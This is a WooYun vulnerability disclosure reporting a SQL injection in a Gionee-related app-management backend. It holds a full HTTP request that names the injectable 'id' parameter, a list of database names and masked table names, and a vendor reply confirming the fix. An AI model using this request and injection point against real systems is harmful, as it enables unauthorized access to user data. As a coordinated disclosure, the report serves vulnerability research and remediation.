当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0178525

漏洞标题:金立手机某处MySQL注入(影响150W用户信息)

相关厂商:gionee.com

漏洞作者: 路人甲

提交时间:2016-02-25 12:35

修复时间:2016-03-03 17:44

公开时间:2016-03-03 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-25: 细节已通知厂商并且等待厂商处理中
2016-02-29: 厂商已经确认,细节仅向厂商公开
2016-03-03: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

金立手机某处MySQL注入(影响150W用户信息)

详细说明:

POST /dvp_app_shoufa_edit.php?userid=&token= HTTP/1.1
Host: ht.myaora.net:82
Content-Length: 464
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://ht.myaora.net:82
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5971&package=com.bccv.meitu&act=business
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_026fc5a6a4f9402e52f6011dd6a28899=1456117728; PHPSESSID=prbh2flgmhv9e73ged9qa6goo1
hidtype=2&id=5971&softid=0&package=com.bccv.meitu&dvp_id=27596&name=%E5%A3%AB%E5%A4%A7%E5%A4%AB%E9%9A%8F%E9%A3%8E%E5%80%92+&app_id=0&start_time=&sel_state=4&act=business&Submit=%E6%8F%90%E4%BA%A4%E7%BB%93%E6%9E%9C&refuse=%E8%AF%B7%E4%B8%8A%E4%BC%A0%E5%85%AC%E5%8F%B8%E5%90%8D%E8%AF%81%E7%85%A7%EF%BC%8C%E8%AF%B7%E4%BF%AE%E6%94%B9%E5%85%AC%E5%8F%B8%E5%90%8D%E7%A7%B0%EF%BC%8C%E8%AF%B7%E8%AF%A6%E7%BB%86%E5%86%99%E6%B8%85%E5%BA%94%E7%94%A8%E8%AF%B4%E6%98%8E%E3%80%82


id存在注入

1.png


available databases [13]:
[*] #mysql50#lost+found
[*] abc
[*] aorausermanagerdb
[*] att
[*] att_2
[*] comment
[*] dw_market_king
[*] information_schema
[*] market_king
[*] mysql
[*] pad_market
[*] performance_schema
[*] test


2.png


3.png


mask 区域
*****arket_*****
*****tab*****
*****---------*****
*****pp_VS *****
***** *****
*****T *****
*****FTTHUMB *****
***** *****
***** *****
***** *****
***** *****
*****re_list *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****fo *****
*****fo_2016 *****
*****fo_2016_0*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ft *****
***** *****
***** *****
***** *****
*****mmend *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****k *****
*****alog *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****serinfo_2*****
*****special *****
*****ore_histo*****
*****og *****
***** *****
*****opy *****
*****core *****
*****score *****
***** *****
*****rd2016 *****
*****rd2016020*****
***** *****
*****e_history*****
***** *****
*****e *****
***** *****
*****_0201 *****
*****_0202 *****
*****_0203 *****
*****_0204 *****
*****_0205 *****
*****_0206 *****
*****_0207 *****
*****_0208 *****
*****_0209 *****
*****_0210 *****
*****_0211 *****
*****_0212 *****
*****_0213 *****
*****_0214 *****
*****_0215 *****
*****k *****
***** *****
***** *****
*****_history *****
*****oad *****
***** *****
***** *****
*****00 *****
*****00 *****
*****ore_histo*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****talog *****
*****atus *****
***** *****
***** *****
*****y *****
*****y_dates *****
*****siness *****
***** *****
*****_ver *****
***** *****
*****l *****
***** *****
*****g *****
*****e *****
***** *****
***** *****
***** *****
***** *****
*****hot *****
***** *****
*****disabledd*****
*****noapk *****
*****ize *****
***** *****
*****tt *****
***** *****
*****_20160201*****
***** *****
*****aw *****
***** *****
*****sk *****
***** *****
***** *****
***** *****
***** *****
*****g *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****le *****
*****ule *****
***** *****
***** *****
***** *****
***** *****
*****_data *****
***** *****
***** *****
***** *****
*****d *****
***** *****
***** *****
***** *****
*****nt *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****screensho*****
*****ore *****
*****eyword *****
***** *****
***** *****
***** *****
*****al *****
*****ge_consol*****
*****ge_online*****
*****ge_specia*****
*****d_input *****
***** *****
*****ta *****
*****story *****
*****age *****
*****re *****
***** *****
*****unt *****
*****load_list*****
*****r *****
*****_setting *****
*****in *****
***** *****
*****ore *****
*****e *****
*****on *****
*****on_conten*****
***** *****
***** *****
*****ner *****
*****k *****
*****e *****
*****t *****
*****t_v4 *****
*****atics *****
*****_adapter *****
***** *****
*****k_input *****
*****ut *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****crement *****
***** *****
***** *****
***** *****
*****n_soft *****
*****idate *****
***** *****
*****d *****
***** *****
***** *****
***** *****
***** *****
*****db *****
***** *****
***** *****
*****r *****
***** *****
***** *****
*****_copy *****
***** *****
***** *****
***** *****
***** *****
*****as *****
***** *****
***** *****
*****ddres *****
***** *****
*****_account *****
*****illegal *****
*****list *****
*****list_upda*****
*****d *****
***** *****
***** *****
*****ord *****
*****ing *****
***** *****
***** *****
***** *****
*****r *****
***** *****
***** *****
*****k *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****tegory *****
***** *****
***** *****
***** *****
***** *****
*****s *****
***** *****
***** *****
*****s *****
***** *****
***** *****
***** *****
*****screensho*****
*****ad_rank *****
***** *****
***** *****
*****_content *****
***** *****
*****_task *****
***** *****
***** *****
*****_ad *****
***** *****
*****ent *****
*****s *****
*****ts *****
***** *****
***** *****
*****_ad *****
***** *****
***** *****
*****ontent *****
*****ot_data *****
*****henhe *****
*****emp *****
*****opic *****
*****ulan *****
***** *****
***** *****
***** *****
***** *****
*****l *****
***** *****
***** *****
*****ire *****
*****ire_answe*****
*****ire_detai*****
*****ire_exams*****
*****ire_histo*****
***** *****
*****e *****
***** *****
***** *****
*****n *****
***** *****
*****tent *****
***** *****
*****ter_keywo*****
***** *****
***** *****
*****_score *****
*****tall *****
*****el *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****te *****
***** *****
*****0 *****
*****ck *****
*****idu_new *****
*****itun *****
*****ndoujia *****
*****ndoujia_a*****
*****ngyongbao*****
*****ngyongbao*****
*****uxidating*****
*****imeiyingy*****
***** *****
***** *****
***** *****
***** *****
*****g *****
***** *****
***** *****
***** *****
***** *****
*****list *****
*****pe *****
***** *****
*****ee_score *****
*****ore *****
***** *****
***** *****
*****e *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****_catalog *****
*****word *****
*****k *****
*****cial *****
*****t *****
*****ght *****
*****ord *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ecord *****
*****unt *****
*****---------*****


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-02-29 15:09

厂商回复:

谢谢,已经告知相关公司同事 。谢谢

最新状态:

2016-03-03:相关同事已经修复。谢谢